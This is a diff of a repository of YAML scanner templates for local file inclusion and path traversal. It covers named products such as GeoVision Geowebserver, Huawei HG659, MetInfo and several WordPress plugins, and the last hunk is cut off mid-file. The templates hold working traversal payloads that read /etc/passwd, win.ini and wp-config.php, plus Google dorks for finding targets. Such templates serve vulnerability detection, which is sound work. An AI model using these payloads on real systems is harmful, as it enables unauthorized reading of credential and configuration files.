"{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00" - - "{{BaseURL}}/index.php?page=etc/shells" - - "{{BaseURL}}/index.php?page=etc/shells%00" - - "{{BaseURL}}/index.php?page=../../etc/shells" - - "{{BaseURL}}/index.php?page=....//....//etc/shells" - - "{{BaseURL}}/../../../../../../../../../etc/shells" - + - "{{BaseURL}}/etc/passwd" + - "{{BaseURL}}/..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" stop-at-first-match: true matchers: - - type: word - words: - - "# valid login shells" - - "/bin/sh" - - "/bin/ash" - - "/bin/bash" - condition: and + - type: regex + regex: + - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/generic-windows-lfi.yaml b/poc/local_file_inclusion/generic-windows-lfi.yaml index f91fbe4dd3..ce9d6295ad 100644 --- a/poc/local_file_inclusion/generic-windows-lfi.yaml +++ b/poc/local_file_inclusion/generic-windows-lfi.yaml @@ -1,13 +1,9 @@ id: generic-windows-lfi info: - name: Windows - Local File Inclusion + name: Generic Windows based LFI Test author: mesaglio,sushantkamble severity: high - description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Searches for /windows/win.ini on passed URLs tags: azure,windows,lfi,generic requests: - method: GET @@ -31,5 +27,3 @@ requests: - "extensions" condition: and part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml b/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml index 6f8dc53b3e..c0e7dbfcad 100644 --- a/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml +++ b/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml @@ -1,19 +1,22 @@ id: geowebserver-lfi + info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: - - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi + requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -21,6 +24,7 @@ requests: - "extensions" condition: and part: body + - type: status status: - 200 diff --git a/poc/local_file_inclusion/health-check-lfi-7921.yaml b/poc/local_file_inclusion/health-check-lfi-7921.yaml index cf4e8e2ff9..c6e1a39f3c 100644 --- a/poc/local_file_inclusion/health-check-lfi-7921.yaml +++ b/poc/local_file_inclusion/health-check-lfi-7921.yaml @@ -1,23 +1,17 @@ id: health-check-lfi info: - name: WordPress Health Check & Troubleshooting <1.24 - Local File Inclusion + name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal author: DhiyaneshDK severity: high - description: WordPress Health Check & Troubleshooting prior to 1.2.4 is vulnerable to local file inclusion. Exploitation does require authentication. - remediation: Upgrade to version 1.2.4 or later. + description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability. + remediation: Fixed in version 1.2.4 reference: - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan - metadata: - max-request: 2 + tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -49,5 +43,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml b/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml index b626b6bce6..003dee02ce 100644 --- a/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml +++ b/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml @@ -5,13 +5,13 @@ info: author: dhiyaneshDK severity: high description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. - remediation: Upgrade to version 1.4 or later. - reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ + reference: + - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 - cve-id: cwe-id: CWE-22 + remediation: Upgrade to version 1.4 or later. tags: wordpress,wp-plugin,lfi,wp requests: diff --git a/poc/local_file_inclusion/huawei-hg659-lfi.yaml b/poc/local_file_inclusion/huawei-hg659-lfi.yaml index 218c72de11..db6b65b82f 100644 --- a/poc/local_file_inclusion/huawei-hg659-lfi.yaml +++ b/poc/local_file_inclusion/huawei-hg659-lfi.yaml @@ -1,28 +1,26 @@ id: huawei-hg659-lfi + info: - name: HUAWEI HG659 - Local File Inclusion + name: HUAWEI HG659 LFI author: pikpikcu severity: high - description: HUAWEI HG659 is vulnerable to local file inclusion. - reference: + reference: | - https://twitter.com/sec715/status/1406782172443287559 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,huawei + requests: - method: GET path: - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/poc/local_file_inclusion/ibm-infoprint-lfi.yaml b/poc/local_file_inclusion/ibm-infoprint-lfi.yaml index 899fad8ae8..c7df45d4c4 100644 --- a/poc/local_file_inclusion/ibm-infoprint-lfi.yaml +++ b/poc/local_file_inclusion/ibm-infoprint-lfi.yaml @@ -1,5 +1,4 @@ id: ibm-infoprint-lfi - info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer - requests: - method: GET path: diff --git a/poc/local_file_inclusion/jeewms-lfi.yaml b/poc/local_file_inclusion/jeewms-lfi.yaml index 14c348eee1..5346e10fc0 100644 --- a/poc/local_file_inclusion/jeewms-lfi.yaml +++ b/poc/local_file_inclusion/jeewms-lfi.yaml @@ -1,36 +1,28 @@ id: jeewms-lfi - info: name: JEEWMS LFI author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g tags: jeewms,lfi - requests: - raw: - | #linux - GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 + GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - "\\[(font|extension|file)s\\]" condition: or part: body - - type: status status: - 200 diff --git a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml index 0dedb521b3..c25375a9bb 100644 --- a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml +++ b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml @@ -1,24 +1,19 @@ id: jinfornet-jreport-lfi - info: name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2020030151 tags: jreport,jinfornet,lfi - requests: - method: GET path: - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/magicflow-lfi-8713.yaml b/poc/local_file_inclusion/magicflow-lfi-8713.yaml index f4e66ee647..08cf21df8d 100644 --- a/poc/local_file_inclusion/magicflow-lfi-8713.yaml +++ b/poc/local_file_inclusion/magicflow-lfi-8713.yaml @@ -1,4 +1,5 @@ id: magicflow-lfi + info: name: MagicFlow - Local File Inclusion author: gy741 @@ -6,16 +7,20 @@ info: description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. reference: https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi + requests: - method: GET path: - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd" - "{{BaseURL}}/msa/../../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/metinfo-lfi.yaml b/poc/local_file_inclusion/metinfo-lfi.yaml index 8c1189d33c..9a794bbcb0 100644 --- a/poc/local_file_inclusion/metinfo-lfi.yaml +++ b/poc/local_file_inclusion/metinfo-lfi.yaml @@ -1,23 +1,18 @@ id: metinfo-lfi info: - name: MetInfo <=6.1.0 - Local File Inclusion + name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://paper.seebug.org/676/ tags: metinfo,lfi + requests: - method: GET path: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -29,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml b/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml index 9d81afe4e4..7da00d4946 100644 --- a/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml +++ b/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml @@ -16,5 +16,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body diff --git a/poc/local_file_inclusion/oracle-fatwire-lfi.yaml b/poc/local_file_inclusion/oracle-fatwire-lfi.yaml index 6038f21723..e014de6a11 100644 --- a/poc/local_file_inclusion/oracle-fatwire-lfi.yaml +++ b/poc/local_file_inclusion/oracle-fatwire-lfi.yaml @@ -2,15 +2,10 @@ id: oracle-fatwire-lfi info: name: Oracle Fatwire 6.3 - Path Traversal author: Bernardo Rodrigues @bernardofsr - severity: high - description: | - Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. + severity: critical + description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint reference: - https://www.exploit-db.com/exploits/50167 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 tags: lfi,oracle,fatwire requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml b/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml index a11b89cac1..68149be506 100644 --- a/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml +++ b/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml @@ -1,23 +1,27 @@ id: pacsone-server-lfi - info: - name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal + name: PACSOne Server 6.6.2 - Local File Inclusion author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2018010303 + description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer. + reference: + - https://cxsecurity.com/issue/WLB-2018010303 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: pacsone,lfi - requests: - method: GET path: - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/phpwiki-lfi-9567.yaml b/poc/local_file_inclusion/phpwiki-lfi-9567.yaml index 8d310252a7..d48b733698 100644 --- a/poc/local_file_inclusion/phpwiki-lfi-9567.yaml +++ b/poc/local_file_inclusion/phpwiki-lfi-9567.yaml @@ -1,23 +1,24 @@ id: phpwiki-lfi + info: - name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion + name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. - reference: - - https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + requests: - method: GET path: - "{{BaseURL}}/phpwiki/index.php/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/processmaker-lfi.yaml b/poc/local_file_inclusion/processmaker-lfi.yaml index 744b09bbf9..353a119874 100644 --- a/poc/local_file_inclusion/processmaker-lfi.yaml +++ b/poc/local_file_inclusion/processmaker-lfi.yaml @@ -1,12 +1,16 @@ id: processmaker-lfi info: - name: ProcessMaker <= 3.5.4 Directory Traversal + name: ProcessMaker <=3.5.4 - Local File Inclusion author: KrE80r severity: high - description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. + description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/50229 - https://www.processmaker.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: processmaker,lfi requests: - raw: @@ -17,7 +21,9 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml b/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml index d601167120..ead2351a23 100644 --- a/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml +++ b/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml @@ -1,25 +1,17 @@ id: ruijie-networks-lfi - info: - name: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion + name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI author: pikpikcu severity: high - description: Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. - reference: - - https://exploit-db.com/exploits/48755 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. + reference: https://exploit-db.com/exploits/48755 tags: ruijie,lfi - requests: - method: GET path: - "{{BaseURL}}/download.do?file=../../../../config.text" matchers-condition: and matchers: - - type: word words: - 'filename="config.text"' @@ -30,9 +22,6 @@ requests: - "version S29_RGOS 11.4" part: body condition: and - - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml b/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml index 77d96f4a9f..a58df73c46 100644 --- a/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml +++ b/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml @@ -1,27 +1,25 @@ id: simple-image-manipulator-lfi + info: - name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion + name: Simple Image Manipulator v1.0 - Remote file download author: dhiyaneshDK severity: high - description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/sl-studio-lfi-10320.yaml b/poc/local_file_inclusion/sl-studio-lfi-10320.yaml index 90dd6e278e..9679b24436 100644 --- a/poc/local_file_inclusion/sl-studio-lfi-10320.yaml +++ b/poc/local_file_inclusion/sl-studio-lfi-10320.yaml @@ -1,15 +1,10 @@ id: sl-studio-lfi info: - name: Webbdesign SL-Studio - Local File Inclusion + name: Webbdesign SL-Studio Directory Traversal author: 0x_Akoko severity: high - description: Webbdesign SL-Studio is vulnerable to local file inclusion. reference: - https://cxsecurity.com/issue/WLB-2018110187 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 metadata: google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' tags: slstudio,lfi @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml b/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml index 4e865626ce..88c4402fbb 100644 --- a/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml +++ b/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml @@ -1,23 +1,22 @@ id: sofneta-mecdream-pacs-lfi + info: - name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal author: 0x_akoko severity: high - description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion. + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal reference: - https://www.exploit-db.com/exploits/45347 - https://www.softneta.com/products/meddream-pacs-server/downloads.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 metadata: google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login tags: sofneta,lfi + requests: - method: GET path: - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + matchers: - type: word part: body @@ -26,5 +25,3 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/squirrelmail-lfi.yaml b/poc/local_file_inclusion/squirrelmail-lfi.yaml index cb9ac19bdd..cd19073867 100644 --- a/poc/local_file_inclusion/squirrelmail-lfi.yaml +++ b/poc/local_file_inclusion/squirrelmail-lfi.yaml @@ -1,9 +1,15 @@ id: squirrelmail-lfi info: - name: SquirrelMail 1.2.11 Local File Inclusion + name: SquirrelMail 1.2.11 - Local File Inclusion author: dhiyaneshDk severity: high - reference: https://www.exploit-db.com/exploits/22793 + description: SquirrelMail 1.2.11 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/22793 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: lfi,squirrelmail requests: - method: GET @@ -19,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/thinkcmf-lfi.yaml b/poc/local_file_inclusion/thinkcmf-lfi.yaml index bc1c7aba5e..4c4122ed1e 100644 --- a/poc/local_file_inclusion/thinkcmf-lfi.yaml +++ b/poc/local_file_inclusion/thinkcmf-lfi.yaml @@ -1,26 +1,33 @@ -id: thinkcmf-lfi-3 - +id: thinkcmf-lfi info: - name: ThinkCMF LFI + name: ThinkCMF - Local File Inclusion author: pikpikcu severity: high - reference: https://www.freebuf.com/vuls/217586.html + description: ThinkCMF is vulnerable to local file inclusion. + reference: + - https://www.freebuf.com/vuls/217586.html + metadata: + win-payload: ../../../../../../../../../../../../../../../../windows/win.ini + unix-payload: ../../../../../../../../../../../../../../../../etc/passwd + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: thinkcmf,lfi - requests: - method: GET path: - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini" - + - "{{BaseURL}}/?a=display&templateFile=README.md" matchers-condition: and matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - "bit app support" - + - type: word + condition: and + words: + - "ThinkCMF" + - "## README" + - "## UPDATE" - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml b/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml index 6786157651..747c17bdeb 100644 --- a/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml +++ b/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml @@ -1,4 +1,5 @@ id: wp-javospot-lfi + info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko @@ -9,10 +10,12 @@ info: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 diff --git a/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml b/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml +++ b/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml @@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml index 4362f3d8af..010102368f 100644 --- a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml +++ b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml @@ -1,27 +1,17 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/wp-vault-lfi(1).yaml b/poc/local_file_inclusion/wp-vault-lfi(1).yaml old mode 100644 new mode 100755 index 0bb54330d9..8869a324ad --- a/poc/local_file_inclusion/wp-vault-lfi(1).yaml +++ b/poc/local_file_inclusion/wp-vault-lfi(1).yaml @@ -1,24 +1,33 @@ id: wp-vault-local-file-inclusion - info: - name: WP Vault 0.8.6.6 – Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/40850 - tags: wp-plugin,wordpress,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 - matchers-condition: and - matchers: + WordPress Plugin Vault 